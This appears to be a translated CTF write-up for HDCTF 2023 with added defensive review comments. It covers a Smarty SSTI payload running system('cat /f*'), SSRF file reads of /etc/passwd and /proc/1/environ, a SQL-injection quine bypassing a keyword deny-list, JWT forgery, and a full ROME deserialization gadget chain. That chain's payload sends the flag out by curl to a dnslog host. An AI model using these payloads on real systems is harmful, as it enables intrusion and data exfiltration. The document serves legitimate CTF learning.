HDCTF

Welcome To HDCTF 2023

Look at the source code to find game.js

find this string

image-20230422201853964

Paste it into the browser console and run it

image-20230422201938572

SearchMaster

The challenge asks you to submit a parameter named data via POST

Pass in any value and it gets rendered on the page


Passing in a lone { makes the page report an error; the error message reveals the template engine:

image-20230422194322675

Smarty. So this is presumably Smarty SSTI: the submitted data is treated as template source, and the rendered result is sent back to the front end

Just use the {if} tag

{
    
    if phpinfo()}{
    
    /if}

Can execute phpinfo()

Just execute the command directly

data={
    
    if system('cat /f*')}{
    
    /if}

image-20230422201724180

YamiYami

There are three links; click "read somethings" and look at the URL

image-20230422202128558

The url parameter suggests SSRF, so try reading a local file through it

?url=file:///etc/passwd

image-20230422202206664

The file can be read, but the flag file cannot, so try reading the environment variables instead

?url=file:///proc/1/environ

image-20230422202321083

You can see that the flag is in the environment variable

LoginMaster

Scanning the directories with dirsearch turns up

/robots.txt

/**
 * Deny-list check applied to a value before it is used in SQL.
 *
 * Calls alertMes('hacker', 'index.php') when $s contains any listed keyword or
 * character; otherwise it does nothing and returns null.
 *
 * NOTE(review): this is input filtering, not query parameterisation. A keyword
 * deny-list is incomplete by construction (quote characters, for example, are
 * not on it) and it also rejects harmless input: the unanchored "in"
 * alternative matches any value that merely contains "in", such as "admin".
 * The durable fix is to bind $s through a prepared statement.
 * Whether alertMes() stops the request is not visible here; confirm it does.
 *
 * @param string $s value to check
 */
function checkSql($s)
{
    // Case-insensitive, unanchored alternation: a match anywhere in $s counts.
    $denyList = "/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i";

    if (!preg_match($denyList, $s)) {
        return;
    }

    alertMes('hacker', 'index.php');
}
// Excerpt of the login check: the password column of the fetched row is compared
// strictly (type and value) with the submitted $password; a match ends the request
// by printing $FLAG, anything else goes to alertMes("wrong password", ...).
// NOTE(review): the comparison trusts whatever row the query returned, so it is
// only as sound as the query that produced $row. The query itself is not shown
// here; presumably it is built by string concatenation (confirm). If so, use a
// prepared statement and compare against a stored password hash (password_verify)
// rather than a plaintext column.
if ($row['password'] === $password) {
    
    
        die($FLAG);
    } else {
    
    
    alertMes("wrong password",'index.php');

You can refer to this

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#

JavaMonster

jwt

Decode the JWT, change the username from admin to Boogipop, and pass the new token in the cookie: a=1;b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2ODIxNzcxMTgsImlhdCI6MTY4MjE2OTkxOCwidXNlcm5hbWUiOiJCb29naXBvcCJ9.1dfoUuPRgwflPRL8beAumUMOCVFIRCV4yAjXd18Syko

/**
 * Creates a token for the user name "Boogipop" with the challenge's own JwtUtil, then
 * prints the token followed by whatever {@code JwtUtil.Jwttoken} returns for it.
 *
 * <p>NOTE(review): a token minted this way is only accepted by the server if JwtUtil
 * signs with the same HMAC key the server verifies with, i.e. a key that ships inside
 * the application. Presumably it is hard-coded; confirm in JwtUtil. The defensive
 * takeaway is to keep signing keys out of distributable code (load them from a secret
 * store per deployment) and not to derive privileges from the username claim alone.
 *
 * @param args unused
 * @throws UnsupportedEncodingException propagated from the JwtUtil calls
 */
public static void main(String[] args) throws UnsupportedEncodingException {
    final com.ctf.easyjava.utils.JwtUtil jwt = new com.ctf.easyjava.utils.JwtUtil();
    final String signed = jwt.JwtCreate(new User("Boogipop", "123"));

    System.out.println(signed);
    System.out.println(jwt.Jwttoken(signed));
}

hashcode

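The string "USy to solve EasyJava" has the same hashCode() as "Try to solve EasyJava" (String.hashCode() collisions are easy to construct, so comparing hash codes is not an equality check)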

ROME gadget chain with secondary (second-stage) deserialization

The command output is sent out of band via dnslog

package com.ctf.easyjava;

import com.ctf.easyjava.hdctf.HDCTF;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;

import javax.xml.transform.Templates;
import java.util.HashMap;
import static com.ctf.easyjava.Tool.*;

/**
 * Write-up proof of concept for the JavaMonster challenge: builds a nested HashMap object
 * graph around ROME's {@code EqualsBean} and a {@code TemplatesImpl} carrying generated
 * bytecode, then hands it to {@code Tool.run}.
 *
 * <p>Reviewer notes (defensive):
 * <ul>
 *   <li>The root cause this relies on is native Java deserialization of untrusted data with
 *       ROME on the classpath. Avoid native deserialization for untrusted input; where it
 *       cannot be avoided, enforce an allow-list {@code ObjectInputFilter}.</li>
 *   <li>The write-up calls this "secondary deserialization". Presumably the project class
 *       {@code HDCTF} deserializes its wrapped object in a second, inner stream; confirm in
 *       that class. A filter must cover nested streams too (a JVM-wide filter does).</li>
 *   <li>Detection: a Java process spawning {@code /bin/sh}, and outbound DNS/HTTP requests
 *       from the application host to unexpected domains.</li>
 * </ul>
 *
 * <p>{@code setFieldValue} and {@code run} come from the static import of {@code Tool} and
 * are not shown; {@code setFieldValue} presumably sets a private field by reflection.
 */
public class R_SignedObject {
    /**
     * Builds the object graph and passes it to {@code Tool.run}.
     *
     * @param args unused
     * @throws Exception anything raised by javassist or the {@code Tool} helpers
     */
    public static void main(String[] args) throws Exception{
        // Generate a class named "i" that extends AbstractTranslet and whose static
        // initializer runs a shell command.
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("i");
        CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = ctClass.makeClassInitializer();
        // The command reads the flag file line by line and requests <line>.<dnslog host>
        // with curl, so the content leaves the host as an outbound lookup/request.
        constructor.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", \"cat /flag_is_is_here | while read line; do echo $line.4m7ytd.dnslog.cn | xargs curl; done\"});");
        byte[] bytes = ctClass.toBytecode();
        // Place the generated bytecode inside a TemplatesImpl by setting its internal fields.
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
        setFieldValue(obj, "_name", "Poria");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // First layer: EqualsBean bound to the Templates interface and the TemplatesImpl.
        HashMap table1 = getPayload(Templates.class, obj);

        // Wrap the first layer in the challenge's own HDCTF class (project type, not shown).
        HDCTF hdctf = new HDCTF(table1);

        // Second layer: the same construction, now bound to HDCTF and the wrapper object.
        HashMap table2 = getPayload(HDCTF.class, hdctf);
//
        // NOTE(review): Tool.run is not shown; presumably it serializes table2 and submits it
        // with the two string arguments; confirm against Tool.
        run(table2, "debug", "object");
    }
    /**
     * Returns a HashMap whose two keys are themselves HashMaps holding the same
     * {@code EqualsBean} and {@code payloadObj} under swapped keys.
     *
     * @param clazz class written into the bean's {@code _beanClass} field
     * @param payloadObj object written into the bean's {@code _obj} field and stored in both maps
     * @return the outer table containing both inner maps
     * @throws Exception anything raised by {@code setFieldValue}
     */
    public static HashMap getPayload (Class clazz, Object payloadObj) throws Exception{
        // The bean starts out bound to a harmless String; its real fields are only set at the end.
        EqualsBean bean = new EqualsBean(String.class, "r");
        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        // "yy" and "zZ" have the same String.hashCode(); the two maps hold the same pair of
        // values with the keys swapped.
        map1.put("yy", bean);
        map1.put("zZ", payloadObj);
        map2.put("zZ", bean);
        map2.put("yy", payloadObj);
        HashMap table = new HashMap();
        table.put(map1, "1");
        table.put(map2, "2");
        // The bean's fields are overwritten only after every put() above. Presumably this keeps
        // the inserts from operating on the real object while the table is built; confirm.
        setFieldValue(bean, "_beanClass", clazz);
        setFieldValue(bean, "_obj", payloadObj);
        return table;
    }
}

image-20230422213347960


Origin blog.csdn.net/qq_63928796/article/details/130321148